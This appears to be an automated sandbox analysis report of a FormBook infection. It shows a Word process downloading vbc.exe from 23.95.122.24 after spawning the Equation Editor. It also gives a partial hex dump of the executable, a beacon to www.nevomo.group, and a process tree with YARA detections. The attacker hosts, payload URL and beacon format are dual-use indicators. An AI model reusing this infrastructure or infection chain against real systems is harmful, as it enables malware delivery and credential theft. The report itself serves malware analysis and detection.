                                                                                                                                                  ETag: "3263-5bf65b3dc8631"
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Content-Length: 12899
                                                                                                                                                  Keep-Alive: timeout=5, max=99
                                                                                                                                                  Connection: Keep-Alive


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  4192.168.2.224917123.95.122.2480C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Apr 8, 2021 13:18:02.557885885 CEST23OUTGET /zyo/vbc.exe HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                  Host: 23.95.122.24
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Apr 8, 2021 13:18:02.677747011 CEST24INHTTP/1.1 200 OK
                                                                                                                                                  Date: Thu, 08 Apr 2021 11:18:03 GMT
                                                                                                                                                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
                                                                                                                                                  Last-Modified: Thu, 08 Apr 2021 04:59:44 GMT
                                                                                                                                                  ETag: "5e800-5bf6eea6ef000"
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Content-Length: 387072
                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: application/x-msdownload
                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 8b 15 e2 5e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 ae 04 00 00 ec 96 03 00 00 00 00 a3 41 00 00 00 10 00 00 00 c0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 9b 03 00 04 00 00 36 08 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 18 9b 03 67 00 00 00 84 0d 9b 03 3c 00 00 00 00 20 9b 03 a0 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 9b 03 9c 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fa 9a 03 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 9a 03 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 63 ac 04 00 00 10 00 00 00 ae 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 d2 95 03 00 c0 04 00 00 1c 00 00 00 b2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 66 69 70 75 68 00 00 01 00 00 00 00 a0 9a 03 00 02 00 00 00 ce 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 77 75 74 61 00 00 00 79 11 00 00 00 b0 9a 03 00 04 00 00 00 d0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 65 77 00 00 00 00 07 49 00 00 00 d0 9a 03 00 4a 00 00 00 d4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 a0 2c 00 00 00 20 9b 03 00 2e 00 00 00 1e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 18 99 00 00 00 50 9b 03 00 9a 00 00 00 4c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL^A@6g< ,PX@.textc `.data@.fipuh@.wutay@.newIJ@@.rsrc, .@@.relocPL@B


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  5192.168.2.224917223.95.122.2480C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Apr 8, 2021 13:19:57.084356070 CEST436OUTOPTIONS / HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                                                                                                                                  translate: f
                                                                                                                                                  Host: 23.95.122.24
                                                                                                                                                  Apr 8, 2021 13:19:57.206953049 CEST437INHTTP/1.1 302 Found
                                                                                                                                                  Date: Thu, 08 Apr 2021 11:19:58 GMT
                                                                                                                                                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
                                                                                                                                                  X-Powered-By: PHP/7.3.27
                                                                                                                                                  Location: http://23.95.122.24/dashboard/
                                                                                                                                                  Content-Length: 0
                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Apr 8, 2021 13:19:57.207365990 CEST437OUTOPTIONS /dashboard/ HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                                                                                                                                  translate: f
                                                                                                                                                  Host: 23.95.122.24
                                                                                                                                                  Apr 8, 2021 13:19:57.328922987 CEST437INHTTP/1.1 200 OK
                                                                                                                                                  Date: Thu, 08 Apr 2021 11:19:58 GMT
                                                                                                                                                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
                                                                                                                                                  Allow: OPTIONS,HEAD,GET,POST,TRACE
                                                                                                                                                  Content-Length: 0
                                                                                                                                                  Keep-Alive: timeout=5, max=99
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Apr 8, 2021 13:19:57.695388079 CEST438INHTTP/1.1 200 OK
                                                                                                                                                  Date: Thu, 08 Apr 2021 11:19:58 GMT
                                                                                                                                                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
                                                                                                                                                  Allow: OPTIONS,HEAD,GET,POST,TRACE
                                                                                                                                                  Content-Length: 0
                                                                                                                                                  Keep-Alive: timeout=5, max=99
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Apr 8, 2021 13:20:01.105123997 CEST438INHTTP/1.1 302 Found
                                                                                                                                                  Date: Thu, 08 Apr 2021 11:20:02 GMT
                                                                                                                                                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
                                                                                                                                                  X-Powered-By: PHP/7.3.27
                                                                                                                                                  Location: http://23.95.122.24/dashboard/
                                                                                                                                                  Content-Length: 0
                                                                                                                                                  Keep-Alive: timeout=5, max=98
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Apr 8, 2021 13:20:01.228305101 CEST439INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                  Date: Thu, 08 Apr 2021 11:20:02 GMT
                                                                                                                                                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
                                                                                                                                                  Allow: OPTIONS,HEAD,GET,POST,TRACE
                                                                                                                                                  Content-Length: 328
                                                                                                                                                  Keep-Alive: timeout=5, max=97
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 36 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6a 20 50 48 50 2f 37 2e 33 2e 32 37 20 53 65 72 76 65 72 20 61 74 20 32 33 2e 39 35 2e 31 32 32 2e 32 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Server at 23.95.122.24 Port 80</address></body></html>
                                                                                                                                                  Apr 8, 2021 13:20:01.586461067 CEST440INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                  Date: Thu, 08 Apr 2021 11:20:02 GMT
                                                                                                                                                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
                                                                                                                                                  Allow: OPTIONS,HEAD,GET,POST,TRACE
                                                                                                                                                  Content-Length: 328
                                                                                                                                                  Keep-Alive: timeout=5, max=97
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 36 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6a 20 50 48 50 2f 37 2e 33 2e 32 37 20 53 65 72 76 65 72 20 61 74 20 32 33 2e 39 35 2e 31 32 32 2e 32 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Server at 23.95.122.24 Port 80</address></body></html>
                                                                                                                                                  Apr 8, 2021 13:20:03.261605978 CEST441INHTTP/1.1 302 Found
                                                                                                                                                  Date: Thu, 08 Apr 2021 11:20:04 GMT
                                                                                                                                                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
                                                                                                                                                  X-Powered-By: PHP/7.3.27
                                                                                                                                                  Location: http://23.95.122.24/dashboard/
                                                                                                                                                  Content-Length: 0
                                                                                                                                                  Keep-Alive: timeout=5, max=96
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Apr 8, 2021 13:20:03.383797884 CEST441INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                  Date: Thu, 08 Apr 2021 11:20:04 GMT
                                                                                                                                                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
                                                                                                                                                  Allow: OPTIONS,HEAD,GET,POST,TRACE
                                                                                                                                                  Content-Length: 328
                                                                                                                                                  Keep-Alive: timeout=5, max=95
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 36 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6a 20 50 48 50 2f 37 2e 33 2e 32 37 20 53 65 72 76 65 72 20 61 74 20 32 33 2e 39 35 2e 31 32 32 2e 32 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Server at 23.95.122.24 Port 80</address></body></html>
                                                                                                                                                  Apr 8, 2021 13:20:03.679924011 CEST442INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                  Date: Thu, 08 Apr 2021 11:20:04 GMT
                                                                                                                                                  Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
                                                                                                                                                  Allow: OPTIONS,HEAD,GET,POST,TRACE
                                                                                                                                                  Content-Length: 328
                                                                                                                                                  Keep-Alive: timeout=5, max=95
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 36 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6a 20 50 48 50 2f 37 2e 33 2e 32 37 20 53 65 72 76 65 72 20 61 74 20 32 33 2e 39 35 2e 31 32 32 2e 32 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Server at 23.95.122.24 Port 80</address></body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  6192.168.2.2249173213.186.33.580C:\Windows\explorer.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Apr 8, 2021 13:20:07.373276949 CEST443OUTGET /nnmd/?K6AlT=OH405Zk&2dul=05SaklKxrHZkuL+bQQlctvxV8/3Vwz7X9JaEuMMyoQZG08GIgMZNFCY5Thf3tPL/fx/p1A== HTTP/1.1
                                                                                                                                                  Host: www.nevomo.group
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                  Data Ascii:
                                                                                                                                                  Apr 8, 2021 13:20:07.402926922 CEST443INHTTP/1.1 301 Moved Permanently
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Thu, 08 Apr 2021 11:20:07 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 162
                                                                                                                                                  Connection: close
                                                                                                                                                  Location: http://nevomo.tech/nnmd?K6AlT=OH405Zk&2dul=05SaklKxrHZkuL+bQQlctvxV8/3Vwz7X9JaEuMMyoQZG08GIgMZNFCY5Thf3tPL/fx/p1A==
                                                                                                                                                  X-IPLB-Instance: 16982
                                                                                                                                                  Set-Cookie: SERVERID77446=2001710|YG7m6|YG7m6; path=/
                                                                                                                                                  Cache-control: private
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                  Code Manipulations

                                                                                                                                                  Statistics

                                                                                                                                                  Behavior

                                                                                                                                                  Click to jump to process

                                                                                                                                                  System Behavior

                                                                                                                                                  General

                                                                                                                                                  Start time:13:17:35
                                                                                                                                                  Start date:08/04/2021
                                                                                                                                                  Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                                                                                                  Imagebase:0x13f720000
                                                                                                                                                  File size:1424032 bytes
                                                                                                                                                  MD5 hash:95C38D04597050285A18F66039EDB456
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  General

                                                                                                                                                  Start time:13:17:45
                                                                                                                                                  Start date:08/04/2021
                                                                                                                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:543304 bytes
                                                                                                                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  General

                                                                                                                                                  Start time:13:17:47
                                                                                                                                                  Start date:08/04/2021
                                                                                                                                                  Path:C:\Users\Public\vbc.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:387072 bytes
                                                                                                                                                  MD5 hash:29E8627D7B80C21FC98C82314F3DF5E2
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                  • Detection: 42%, ReversingLabs
                                                                                                                                                  Reputation:low

                                                                                                                                                  General

                                                                                                                                                  Start time:13:17:48
                                                                                                                                                  Start date:08/04/2021
                                                                                                                                                  Path:C:\Users\Public\vbc.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:387072 bytes
                                                                                                                                                  MD5 hash:29E8627D7B80C21FC98C82314F3DF5E2
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.2145801175.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.2145801175.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.2145801175.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.2196489051.0000000002360000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.2196489051.0000000002360000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.2196489051.0000000002360000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.2145829902.0000000000530000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.2145829902.0000000000530000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.2145829902.0000000000530000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  Reputation:low

                                                                                                                                                  General

                                                                                                                                                  Start time:13:17:52
                                                                                                                                                  Start date:08/04/2021
                                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:
                                                                                                                                                  Imagebase:0xffca0000
                                                                                                                                                  File size:3229696 bytes
                                                                                                                                                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  General

                                                                                                                                                  Start time:13:18:04
                                                                                                                                                  Start date:08/04/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                                                  Imagebase:0xc90000
                                                                                                                                                  File size:27136 bytes
                                                                                                                                                  MD5 hash:32297BB17E6EC700D0FC869F9ACAF561
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.2369459750.0000000000490000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.2369459750.0000000000490000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.2369459750.0000000000490000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
